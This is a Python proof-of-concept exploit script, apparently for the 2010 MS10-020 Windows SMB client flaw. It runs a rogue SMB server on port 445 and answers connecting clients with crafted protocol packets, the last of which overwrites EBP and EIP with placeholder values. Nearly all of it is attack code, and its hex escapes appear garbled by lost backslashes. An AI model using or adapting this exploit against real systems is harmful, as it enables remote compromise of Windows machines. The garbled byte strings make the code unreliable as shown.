ms10-020.txt
Posted on 19 April 2010
import sys,SocketServer EBP = "x42x42x42x42" EIP = "x41x41x41x41" packetnego = ( "x00x00x00x55" "xffx53x4dx42x72x00x00x00x00x98x53xc8x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00xffxfex00x00x00x00" "x11x05x00x03x0ax00x01x00x04x11x00x00x00x00x01x00" "x00x00x00x00xfdxe3x00x80x1ax49xf9x22xfbx86xcax01" "x88xffx00x10x00xf0xe4x54xc4x50x6cxb2x4axb9x3ax6b" "xcfxb0x8cx8dxaf" ) packetsession = ( "x00x00x01x3d" "xffx53x4dx42x73x16x00x00xc0x98x07xc8x00x00x00x00" "x00x00x00x00x00x00x00x00xffxffxffxfex00x08x10x00" "x04xffx00x3dx01x00x00xc8x00x12x01x4ex54x4cx4dx53" "x53x50x00x02x00x00x00x0cx00x0cx00x38x00x00x00x15" "x82x8axe2x16x7ax68x5fxc6x0cx78xd8x00x00x00x00x00" "x00x00x00x84x00x84x00x44x00x00x00x05x01x28x0ax00" "x00x00x0fx46x00x55x00x43x00x4bx00x55x00x32x00x02" "x00x0cx00x46x00x55x00x43x00x4bx00x55x00x32x00x01" "x00x0cx00x46x00x55x00x43x00x4bx00x55x00x32x00x04" "x00x22x00x66x00x75x00x63x00x6bx00x75x00x32x00x2e" "x00x74x00x65x00x73x00x74x00x2ex00x6cx00x6fx00x63" "x00x61x00x6cx00x03x00x22x00x66x00x75x00x63x00x6b" "x00x75x00x32x00x2ex00x74x00x65x00x73x00x74x00x2e" "x00x6cx00x6fx00x63x00x61x00x6cx00x06x00x04x00x01" "x00x00x00x07x00x08x00xe8x62xc8x16xfbx86xcax01x00" "x00x00x00x00x57x00x69x00x6ex00x64x00x6fx00x77x00" "x73x00x20x00x35x00x2ex00x31x00x00x00x57x00x69x00" "x6ex00x64x00x6fx00x77x00x73x00x20x00x32x00x30x00" "x30x00x30x00x20x00x4cx00x41x00x4ex00x20x00x4dx00" "x61x00x6ex00x61x00x67x00x65x00x72x00x00" ) packetsession2 = ( "x00x00x00x75" "xffx53x4dx42x73x00x00x00x00x98x07xc8x00x00x00x00" "x00x00x00x00x00x00x00x00xffxffxffxfex00x08x20x00" "x04xffx00x75x00x01x00x00x00x4ax00x00x57x00x69x00" "x6ex00x64x00x6fx00x77x00x73x00x20x00x35x00x2ex00" "x31x00x00x00x57x00x69x00x6ex00x64x00x6fx00x77x00" "x73x00x20x00x32x00x30x00x30x00x30x00x20x00x4cx00" "x41x00x4ex00x20x00x4dx00x61x00x6ex00x61x00x67x00" "x65x00x72x00x00" ) packetree = ( "x00x00x00x38" "xffx53x4dx42x75x00x00x00x00x98x07xc8x00x00x00x00" "x00x00x00x00x00x00x00x00x00x08xffxfex00x08x30x00" "x07xffx00x38x00x01x00xffx01x00x00xffx01x00x00x07" "x00x49x50x43x00x00x00x00" ) packetntcreate = ( "x00x00x00x87" "xffx53x4dx42xa2x00x00x00x00x98x07xc8x00x00x00x00" "x00x00x00x00x00x00x00x00x00x08x84x08x00x08x40x00" "x2axffx00x87x00x00x00x40x01x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x80x00x00x00" "x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x02x00xffx05x00xffxa2x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x9bx01x12" "x00x9bx01x12x00x00x00" ) packetrans = ( "x00x00x00x5a" "xffx53x4dx42x32x00x00x00x00x98x07xc8x00x00x00x00" "x00x00x00x00x00x00x00x00x00x08x30x0bx00x08x50x00" "x0ax02x00x18x00x00x00x02x00x38x00x00x00x18x00xff" "xffx00x00x00x00x1fx00x00x00x00x00x00x00x10x00x00" "x41x42x43x44x45x46x47x48x49x50x51x52x53x54x55x56" "x02x61"+EBP+EIP ) class SMB1(SocketServer.BaseRequestHandler): def server_bind(self): self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1) self.socket.bind(self.server_address) def handle(self): try: while True: print "From:", self.client_address data = self.request.recv(1024) ##Negotiate Protocol Response if data[8] == "x72": self.request.send(packetnego) print "Negotiate Response sent " ##Session Setup AndX Response, NTLMSSP_CHALLENGE, Error: STATUS_MORE_PROCESSING_REQUIRED if data[8] == "x73": self.request.send(packetsession) print "Session Response sent " #Session Setup AndX Response data = self.request.recv(1024) if data[8] == "x73": self.request.send(packetsession2) print "Session 2 Response sent " ##Tree Connect AndX Response if data[8] == "x75": self.request.send(packetree) print "TREE Response sent " ##NT Create AndX Response, FID: 0x4000 if data[8] == "xa2": self.request.send(packetntcreate) print "NT create Response sent " ####Trans2 Response, QUERY_FS_INFO if data[8] == "x32": self.request.send(packetrans) print "Trans2 Response sent box pwned " except Exception: print "oups" self.request.close() print "Disconnected from", self.client_address SocketServer.TCPServer.allow_reuse_address = 1 launch = SocketServer.TCPServer(('', 445),SMB1) launch.serve_forever()
